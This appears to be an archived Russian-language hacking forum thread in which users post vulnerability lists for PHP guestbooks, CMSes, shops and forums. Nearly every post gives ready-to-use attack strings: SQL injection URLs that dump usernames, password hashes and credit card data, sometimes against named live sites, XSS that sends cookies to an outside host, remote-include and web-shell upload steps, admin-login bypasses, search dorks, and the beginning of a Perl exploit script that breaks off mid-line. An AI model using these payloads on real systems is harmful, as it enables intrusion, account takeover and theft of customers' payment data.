editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

CS-Forum 0.81
read.php?msg_result=[XSS]
/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
/index.php?search=%'[SQL_SELECT]%23
/index.php?debut=1[SQL]

Чаты:
Andys Chat 4.5
/register.PHP?action=[CMD-Script]

Talisman

03.03.2007, 02:10

Гостевуха:
Sad Raven Guest Book:
в поле HTTP_X_FORWARDED_FOR вставляем 67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS -- и постим сообщение, более подробно тут: тут (http://www.forum.antichat.ru/thread34479.html)
тут ВИДЕО (http://slil.ru/24013333)

Lesnoy_chelovek

03.03.2007, 12:55

D3Jeeb:
http://www.target.com/fastlinks.php?catid=[SQL]
http://www.target.com/catogary.php?catid=[SQL]

Dating Agent PRO:
http://target.xx/picture.php?pid=1[SQL]
http://target.xx/mem.php?mid=1[SQL]
http://target.xx/search.php?search=3&sex=1[SQL]

dating biz@ dating script:
http://www.example.com/user_view.php?u=<iframe%20src=http://ha.ckers.org/scriptlet.html>

Dawaween:
http://www.target.com/poems/poems.php?division=diwan&action=view&offset=25&id=[sql]

DCP-Portal 6.1.х:
http://example/[dp_path]/library/lib.php?root=[cmd_url]

Dev web management system 1.5:
http://[цель]/[путь]/download_now.php?target=9999999999999[SQL]
http://[target]/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>
http://[target]/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>

DirectContact 0.3b:
http://[host]:[port]/..\..\..\..\windows/system.ini

dotProject 2.0.1:
1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
3) /includes/session.php?baseDir=[REMOTE INCLUDE]
4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

DVguestbook 1.0:
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>

DVguestbook 1.2.2:
http://victim/path/index.php?page="><script>alert(document.cookie)</script>
http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.domain)</script>

Alexsize

23.03.2007, 12:11

От себя могу добавить парочку уязвимостей. Актуальны ОСОБЕННО для новичков. Так как очень просты. Актуальны и сейчас!

PHP-Nuke:

_http://www.example.com/nuke_path/iframe.php?file=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm

_http://www.example.com/nuke_path/htmltonuke.php?filnavn=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm

Grey

25.04.2007, 15:06

Гостевые книги:

1. gBook 1.4 MySQL Beta

Можно попасть в админку минуя ввод логина и пароля:

http://site.ru/gb/index.php?login=true

--------------------

2. ScozBook BETA 1.1

Активные XSS:

При вводе сообщения в поля AIM и Web-Site Name вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

3. Tuchosoft guestbook v.0.2

Активные XSS:

При вводе сообщения в поля Name, email и Homepage вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

4. asn guestbook 1.5

1) Пасивная XSS:

http://site.ru/gb/footer.php?version=<script>alert();</script>

2) Имея доступ к админке, можно сделать SQL инъекцию (к примеру для вывода инфы из других таблиц (к примеру таблиц от движка сайта)):

http://site.ru/gb/gbadmin.php?act=detil&id=-1+union+select+1,2,3,4,5,6,7,8/*

--------------------

5. Sad Raven's Guestbook v1.1

Заливка шела:

В админке выбираем "Настройки":

http://site.ru/gb/admin.php?design

Здесь можно редактровать файлы header.inc.php и footer.inc.php.

К примеру редактируем файл footer.inc.php добавляя в него php код (к примеру <?php echo(123); ?>).

Теперь заходим по адресу:

http://site.ru/gb/design/footer.inc.php

и видим результат выполнения скрипта.

--------------------

6. Destinyd-Book 1.4

Пасивные XSS:

http://site.ru/gb/config/footer.php?copy=<script>alert();</script>

http://site.ru/gb/config/template.php?newname=<script>alert();</script>

--------------------

7. MLSOFT_quest 1.1

1) Активная XSS:

При вводе сообщения в поле e-mail вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

2) SQL инъекция:

http://site.ru/gb/index.php?action=quest&next=-1+union+select+1,2,3,4,5,6,7,8/*

--------------------

8. SD GBook 1.0

Активная XSS:

При вводе сообщения в поле Город вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

--------------------

9. XdN Guest Book 0.10

Пасивная XSS:

http://site.ru/inc_footer.php?fonts=<script>alert();</script>

Grey

26.04.2007, 22:01

Новостные двиги:

1. WMNews Версия 0.2

Пасивная XSS:

http://site.ru/footer.php?site_title=<script>alert();</script>

--------------------

2. BGDev News 0.1

SQL инъекция:

http://site.ru/news_comments.php?id='+union+select+1,2,3,4,5,6,7, 8,9/*

--------------------

3. Z-Breaknews 0.1

SQL инъекция:

http://site.ru/single.php?id=-1+union+select+1,2,3,4/*
http://site.ru/single.php?id=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4/*

--------------------

4. OxyNews 0.4

SQL инъекция:

http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,2,3,4,5,6,7,8/*

Вывод логина, пароля и мыла пользователя:

http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,concat(username,char(58),password ,char(58),email),3,4,5,6,7,8+from+oxynews_users/*

--------------------

5. NP v1.1.0

SQL инъекция:

http://site.ru/view.php?id=-1+union+select+1,2,3,4,5/*
http://site.ru/view.php?id=-1+union+select+convert(concat(database(),char(58), user(),char(58),version()),char),2,3,4,5/*

--------------------

6. Somery 0.4-105

Активная XSS:

При добавление комментария в поле name вписываем скрипт. Скрипт будет выполняться при просмотре комментариев.

freddi

26.04.2007, 23:20

Amiro.CMS

Активная хсс в гостевой, уязвимы поля "Заголовок:" и
"Сообщение:"

Искать "Работает на: система управления сайтом Amiro CMS"

Grey

27.04.2007, 20:05

Бесплатные движки инет-магазинов:

1. myInvoice 1

SQL инъекция:

http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*

Вывод номера, логина, хеша пароля (mysql4) и мыла пользователя:

http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat (clientid,char(58),name,char(58),password,char(58) ,email),char),5,6+from+clients/*

--------------------

2. Shop-Script Free

SQL инъекция:

http://site.ru/index.php?CID=-1+union+select+1,2/*
http://site.ru/index.php?CID=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char)/*

--------------------

3. Pricelistme! 1

SQL инъекция:

http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
http://site.ru/one_index_product.php?loginis=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17/*

---------------------------------------------------
---------------------------------------------------

Календари и органайзеры:

1. Geo-Contacts 1.1

SQL инъекция:

http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),cha r(58),user(),char(58),version()),char),5,6,7,8,9,1 0,11,12/*

2. phpAbook 0.8.5b

Пассивная XSS:

http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>

3. php-addressbook v1.2

SQL инъекция:

http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),cha r(58),user(),char(58),version()),char),5,6,7,8,9,1 0,11,12/*

---------------------------------------------------
---------------------------------------------------

Игры:

1. 100 Question Simple Trivia Script 1

SQL инъекция:

http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/*
http://site.ru/trivia.php?trivia_id=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5/*

Grey

30.04.2007, 21:18

Гостевые книги:

1. EzGuestBook 1.1

1) Активные XSS:

При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.

2) SQL инъекция:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*

Вывод логина и пароля пользователя:

http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password ),2,3,4,5+from+ez_guestbook_auth/*

2. ChitChat 2.0

Активная XSS:

При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. ParkerGuestbook v4.00 Add moderators

Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.

Доступ к админке, имя только логин:

http://site.ru/admin.php?adminlogin=grey&logged=1

Доступ к админке, имя только пароль:

http://site.ru/admin.php?adminpass=123&logged=1

4. ParkerGuestbook v2.00

Активные XSS:

При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey

01.05.2007, 17:11

Гостевые книги:

1. NEOgeN GuestBook 1.2

1) Активная XSS:

При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

2) Пасивная XSS:

http://site.ru/footer.php?GBookTitle=<script>alert();</script>

2. Php Trofimov guestbook v1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

3. Trofimov book v1.0

Из-за отсутствия условия входа в админку, можно получить достп в админку:

http://site.ru/gb.php?action=admin

4. Rzhavin FAQ 1.0

1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку:

http://site.ru/admin.php?showform=1

2) Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

5. spiderLog 1.0

Активные XSS:

При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

6. Filebased Guestbook 1.0.1

Активные XSS:

При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

Grey

04.05.2007, 18:40

Новостные двиги:

1. CuteNews rus v025

Пасивная XSS:

http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>

2. CuteNews.RU v.026

Активные XSS:

При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев.

3. pagenews 1.0

1) SQL инъекция:

http://site.ru/insert.php?id='+union+select+1/*
http://site.ru/insert.php?id='+union+select+convert(database(),ch ar)/*

2) Заливка шелла:

При загрузке файлов на сайт, расширение файла не проверяется.

Загружаются файлы в директрию uploads:

http://site.ru/uploads/shell.php

4. Sunny's Simple Diary

SQL инъекция:

http://site.ru/index.php?month='+union+select+1,2,3/*
http://localhost/1/index.php?month='+union+select+1,convert(version() ,char),3/*

5. vNews v1.2

1) Свободный доступ в админку:

http://site.ru/newsadmin.php

2) Активная XSS:

При добавление новости в поле News вписываем скрипт.

3) SQL инъекция:

http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/*
http://site.ru/newscontent.php?action=edit&id='+union+select+1,convert(version(),char),3/*

freddi

04.05.2007, 23:06

5. Sad Raven's Guestbook v1.1

Можно попасть в админку минуя ввод логина и пароля:

http://site.ru/gb/admin.php?logined=1

А можно перейти по ссылке
www.сайт.ru/gb/passwd.dat
и перед нами будет:
<?php
$Password['логин'] = "хеш пароля";
?>

пример
http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php

еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные.

SkyMan

05.05.2007, 13:12

e107 (какая версия не знаю, но не 7.8)
Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение.
http://<путь к картинке>'onload=i=new/**/Image();i.src=unescape('%68%74%74...')+document.co okie;'
где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце.

+StArT+

09.05.2007, 04:37

На днях нашел. :)

BlaB! Lite 2.2
Скрипт для полноценного чата на PHP
Активная XSS:
.................................................. .......................
Уязвимость существует из-за недостаточной
обработки входных данных в поле "Nickname:"
в сценарии login.php:

В поле "Nickname:" пишем: <SCRIPT>alert(document.cookie)</SCRIPT>
Входим,отправляем сообщение,видим знакомый алерт();! ;)
____________________________________

Подмена IP-адреса:
.................................................. .......................
В поле "Nickname:" пишем:

Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес
Входим,отправляем сообщение
(содержание не важно!).

Таким образом в базу заносится не ваш IP-адрес,
а тот который вы указали!

Пример:

http://zeus.aegee.org/cdstuff/chat
_____________________________________
*********************************

Grey

13.05.2007, 18:48

Скрипт знакомств:

Интим-услуги Nevius

1) Пасивная XSS:

http://site.ru/list.php?g=<script>alert();</script>

2) SQL инъекция:

http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36/*

Вывод логина и пароля пользователя:

http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36+from+users/*

Grey

29.05.2007, 18:53

PHP Advanced Transfer Manager Full version: 1.30

Скрипт очень дырявый, в нём еще локальный инклуд файлов находили:

http://forum.antichat.ru/showpost.php?p=217562&postcount=8

а вот про xss вроде не было:

Пасивные XSS:

viewers/txt.php

http://site.ru/viewers/txt.php?filename=<script>alert();</script>
http://site.ru/viewers/txt.php?current_dir=<script>alert();</script>

viewers/jpg.php

http://site.ru/viewers/jpg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpg.php?directory="><script>alert();</script>

viewers/jpeg.php

http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>
http://site.ru/viewers/jpeg.php?directory="><script>alert();</script>

viewers/gif.php

http://site.ru/viewers/gif.php?filename="><script>alert();</script>
http://site.ru/viewers/gif.php?directory="><script>alert();</script>

viewers/bmp.php

http://site.ru/viewers/bmp.php?filename="><script>alert();</script>
http://site.ru/viewers/bmp.php?directory="><script>alert();</script>

viewers/png.php

http://site.ru/viewers/png.php?filename="><script>alert();</script>
http://site.ru/viewers/png.php?directory="><script>alert();</script>

viewers/swf.php

http://site.ru/viewers/swf.php?filename="><script>alert();</script>
http://site.ru/viewers/swf.php?directory="><script>alert();</script>

viewers/mov.php

http://site.ru/viewers/mov.php?filename="><script>alert();</script>
http://site.ru/viewers/mov.php?current_dir="><script>alert();</script>

viewers/tif.php

http://site.ru/viewers/tif.php?filename="><script>alert();</script>
http://site.ru/viewers/tif.php?directory="><script>alert();</script>

Заливка шелла:
------------------

В админке заходим в конфигурацию (Admin: Configure Upload Center)

Там можно редактивровать файлы:

footer.htm
header.htm
info.htm
mailinfo.htm

В любой из них вписываем шелл.
Главное что бы файлы с расширением .htm выполнялись как php.

Lesnoy_chelovek

29.05.2007, 22:28

В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.

NOmeR1

02.06.2007, 23:41

siteframe SQL inj
http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATAB ASE(),0x3a,USER())/*
Скромно, но полезно :)

Grey

04.06.2007, 21:20

WR-Guest 1.0

Активная XSS:

При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.

Dagon

06.06.2007, 16:22

SimPoll v.1.0

Активная XSS:

админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта

google dork: inurl:test_poll_results.php

dmnt

07.06.2007, 17:40

cartkeeper

SQL-inj

hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+sel ect+1,version(),3,user()/*

Grey

09.06.2007, 22:40

Скрипты статистики посещений:

1. Сервер статистики ГелиоСтат

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

2. pronuserinfoSQL v1.2

Активная XSS:

В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

SQL инъекция:

На странице view.php в поле "отследить последних..." вводим:

' union select 1,2,3,4,5,6/*

3. SEbotInfo 2.0

Активная XSS:

На странице в sebot.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php.

4. BotsInfo v0.03

Активная XSS:

На странице в write.php переменные:

HTTP_USER_AGENT вписываем Yandex.

HTTP_HOST вписываем тело скрипта.

Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.

Grey

15.06.2007, 14:18

EJ3 TOP 1.4

Заливка шелла:

При добавление ссылки на сайт в поле Banner URL вводим:

'; ?> <?php Код шелла ?> <?php $a='

После ввода данных получаем ID:

К примеру: 1181902021

Шелл будет доступен по адресу:

http://site.ru/data/1181902021info.php

http://site.ru/data/[id]info.php

-----------------------------------------------------------

Ссылки и каталоги ссылок

1. Link Database

SQL инъекция:

http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/*

2. Link Up

SQL инъекция:

http://site.ru/category.php?category=-1+union+select+1,2/*

Доступ в админку:

http://site.ru/admin/index.php

В поле Username вводим:
' or 1=1 /*

3. SM(links) v2.0

Отсутствие .htaccess:

Смотрим файл config.inc - в нём хранятся логин и пароль к админке:

http://site.ru/config.inc

4. xLink v2.1

Пассивная XSS:

http://site.ru/poisk.php?poisk='><script>alert();</script>

5. My Link 1.00

Активная XSS:

При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок.

6. Quick Link

Активная XSS:

При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.

_Pantera_

20.06.2007, 16:54

scozbook 1.1
http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58 ),adminpass,char(58),adminemail)+using+cp1251),3,4 ,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*

Grey

26.06.2007, 19:52

Гостевые книги:

FastStarter

Активная XSS:

Вписываем скрипт в поле name.

Mandralivre 4.1

Активные XSS:

Вписываем скрипт в поля Votre nom, Votre email, Votre site web.

hwdeGUEST 2.0

Активная XSS:

Вписываем скрипт в поле Name.

_Pantera_

28.06.2007, 02:27

Закрытая гостевая книга v 1.0 (websmith)

вход в админку без пароля www.site.ru/admin/index.php
гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
_________________

guest v1.1

если криво настроены права то можно прочитать файл с логином и паролем
www.site.ru/passwd.dat
все это дело выглядит след образом
<?php
$Password['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
?>
логин - admin
пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4

заливка шелла выполняеться из админ панели
http://site.ru/admin.php?design
в поле файла header.inc.php вписываем
<?php system($_GET[cmd]); ?>
и выполняем
http://site.ru/design/header.inc.php?cmd=команда

NOmeR1

03.07.2007, 23:59

немного PHP-inj.

PHP::HTML 0.6.4 (PHP-inj)
phphtml.php?htmlclass_path=[url]

Media Gallery 1.4.8a (PHP-inj)
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=[file]

YAAP 1.5 (PHP-inj)
includes/common.php?root_path=[file]

NagiosQL 2.00-P00 (PHP-inj)
functions/prepend_adm.php?SETS[path][physical]=[file]

Grey

12.07.2007, 13:16

AMGuests0.3.0

1) Локальный инклуд файлов.

Требуется:

register_globals = On
magic_quotes = Off

http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00

2) Пассивные XSS.

Требуется:

register_globals = On

http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>

Ni0x

12.07.2007, 13:50

Virtual War v1.5.0 or low
XSS и SQL-INJ

http://[host]/vwar/war.php?s=[SQL]
http://[host]/vwar/war.php?page=[SQL]or[XSS]
http://[host]/vwar/war.php?showgame=[SQL]
http://[host]/vwar/war.php?sortby=[SQL]
http://[host]/vwar/war.php?sortorder=[SQL]
http://[host]/vwar/calendar.php?year=[XSS]
http://[host]/vwar/calendar.php?month=[SQL] & [XSS]

зы: Powered by: Virtual War v1.5.0

n0ne

19.07.2007, 18:15

Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.

Пример:

http://www.appointmentsatfive.com/insertorder.cfm?CFID=6060&CFTOKEN=88477579+union+select+1,2,3,ccnum,ccname,6 ,7,8,9,10,11,12,13,cctype,ccexpires,16,17,18,19+fr om+customers/*

Кол-во полей везде разное, но в основном от 15 до 19.

Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.

Вот всё остальное (после TABLE таблица, ниже колонки в ней):

TABLE [Attributes]
[AttributeNum]
[Attribute]
[AttValues]

TABLE [Categories]
[CategoryID]
[Category]
[CatPic]

TABLE [Customers]
[CustID]
[CustFName]
[CustLName]
[CustPhone]
[CustEMail]
[CustAddress1]
[CustAddress2]
[CustCity]
[CustState]
[CustZip]
[CustCountry]
[LastOrderID]
[LastOrderDate]
[LastOrderAmt]
[CCName]
[CCType]
[CCNum]
[CCExpires]
[CustPWord]

TABLE [OrderHist]
[OrderNum]
[CustID]
[ItemID]
[SKU]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Att1]
[Att2]
[Status]

TABLE [Orders]
[OrderID]
[ItemID]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Expires]
[Att1]
[Att2]

TABLE [OrdHistDetail]
[OrderNum]
[CustID]
[GrandTotal]
[Shipping]
[SalesTax]
[OrderDate]
[CustEMail]
[Notes]
[ShipDate]
[ShipMethod]
[ShipName]
[ShipAddress]
[ShipCity]
[ShipState]
[ShipZip]
[upsize_ts]
[AddressStatus]

TABLE [Params]
[storename]
[template]
[password]
[processor]
[partner]
[vendor]
[loginid]
[paypassword]
[certpath]
[type]
[ccards]
[testmode]
[inv_description]
[store_path]
[store_url]
[secure_url]
[order_path]
[order_url]
[orderaction]
[notifyemail]
[db]
[graphic]
[shipmethod]
[selfservice]
[offerpaypal]
[paypalonly]
[ppec]
[cffileenabled]
[csistorename]
[storefax]
[storeaddy]
[storecity]
[storestate]
[storezip]
[avs]
[cvv]
[PPEC_API_UserName]
[PPEC_API_Password]
[PPEC_API_Signature]

TABLE [ProdPics]
[ItemID]
[ItemPic]
[Thumbnail]

TABLE [Products]
[ItemID]
[SKU]
[ItemName]
[CategoryID]
[SubCatID]
[Description]
[Price]
[MSRP]
[DiscAmt]
[DiscIsPct]
[DiscTrigger]
[Weight]
[A1]
[A1Vals]
[A2]
[A2Vals]
[Units]
[Layout]
[Qty_In_Stock]
[Safety_Stock]
[Taxable]
[Shipable]
[Show_Inventory]
[New] [bit]

TABLE [SalesTax]
[State]
[Rate]

TABLE [ShipOptions]
[OptID]
[Option_]
[OptRate]

TABLE [Shipping]
[shiplimit]
[shipfee]

TABLE [SubCats]
[SubCatID]
[SubCat]
[TopCatID]

TABLE [States]
[State]
[Abbreviation]

TABLE [Categories]
[PK_Categories]
[CategoryID]

TABLE [Customers]
[PK_Customers]
[CustID]

TABLE [ProdPics]
[PK_ProdPics]
[ItemID]

TABLE [Products]
[DF_Products_Taxable]
[Taxable]
[DF_Products_Shipable]
[Shipable],
[PK_Products]
[ItemID]

На счет версии не знаю, но в гугле на запрос inurl:"insertorder.cfm" каждая вторая уязвима.

P.S.: Вроде ничё не забыл :)

n0ne

07.08.2007, 21:34

Раскрытие пути в ARTEShok CMS:

http://www.paratech.ru/main.phtml?cid[]=5010072 ^^^ их оф.сайт ^^^

Dr.Frank

28.08.2007, 12:37

CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих)

http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+ta ble_name/*

Наиболее вероятные зачения table_name:
koobi4_user
kpro_user
kpro5_user
kpro6_user

для авторизации нужны email и пароль

Пароль - дважды хэшированный md5: md5(md5($pass))

Grey

15.09.2007, 11:03

Open Guestbook 0.5

Скачать можно здесь:

http://sourceforge.net/project/showfiles.php?group_id=82463

1) Пассивная XSS

http://localhost/header.php?title=</title><script>alert(123);</script>

2) SQL инъекция/активная XSS

В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...

При добавление сообщения в поле Message вводим:

','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*

В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.

phol1eadeux

03.11.2007, 04:02

artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
Пример:
Изменяем содержимое куки на:
')+union+select+column1,column2+from+some_table

Scipio

15.11.2007, 04:39

CONTENTdm

Пассивные XSS:

1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.

кстати найдена мной 05.07.2007 (http://forum.antichat.ru/showpost.php?p=404877&postcount=873)

а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил

2) во многих скриптах в переменной CISOROOT
примеры:
http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(documen t.cookie);%3C/script%3E
http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.c ookie);%3C/script%3E

Ky3bMu4

19.11.2007, 19:03

A-ShopВерсии: 4.4.1(возможно и более ранние) - 4.7.х(last)

SQL-инъекция с доступом в user и с незашифренными пасами.

Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

Пример:

http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32+from+user/*

Админка:
http://www.the123d.com/shop/admin/login.php

Отправил на video@antichat.ru должны скоро выложить.

iddqd

20.01.2008, 14:54

Vendor: http://www.vubb.com/

vuBB alpha RC1

SQL Injection

http://host/forum/index.php?act=viewforum&f=[SQL]
http://host/forum/index.php?act=viewtopic&t=[SQL]
http://host/forum/index.php?act=usercp&view=[SQL]

Active XSS

В профиле пользователя содержимое многих полей не фильтруется. Атакующий может выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Passive XSS

http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%
20SRC=javascript:
alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6

Path disclosure

http://www.example.com/forum/index.php?act=viewforum&f='

vuBB <=0.2

Remote SQL Injection (cookies)

http://milw0rm.com/id.php?id=1543

Index.PHP SQL Injection Vulnerability

http://www.securityfocus.com/vulnerabilities/exploits/vubb_sql_exploit.pl

vuBB <= 0.2.1

SQL Injection, XSS, CRLF Injection, Full Path Disclosure

#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;

# Header
print "\r\n+---------------------------------------+", "\r\n";
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "\r\n";
print "+---------------------------------------+", "\r\n";

# Usage
if(!$ARGV[2]){
print "| Usage: <host> <path> <username> ------|", "\r\n";
print "+---------------------------------------+", "\r\n";
exit;
}

# Host
if($ARGV[0] =~ /http:\/\/(.*)/){
$host = $1;
} else {
$host = $ARGV[0];
}
print "[+]Host: $host\r\n";

# Var
my $path = $ARGV[1];
my $user = $ARGV[2]; print "[+]User: $user\r\n";
my $port = 80;
my $fpd = "http://".$host.$path."includes/vubb.php";
my $err1 = "[-]Can't connect to the host\r\n";
my $err2 = "[-]Can't retrieve the full path\r\n";
my $err3 = "[-]Can't retrieve the results\r\n";
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";

# Full Path Disclosure
$req0 = get($fpd) or die print $err1 and end();
if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {
$fullpath = $1."/thisismypasswd.txt";
print "[+]Path: $1\r\n";
} else {
print $err2 and end();
}

# Malicious data
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";
my $ldat = length $pdat;
my $req1 = IO::Socket::INET->new(
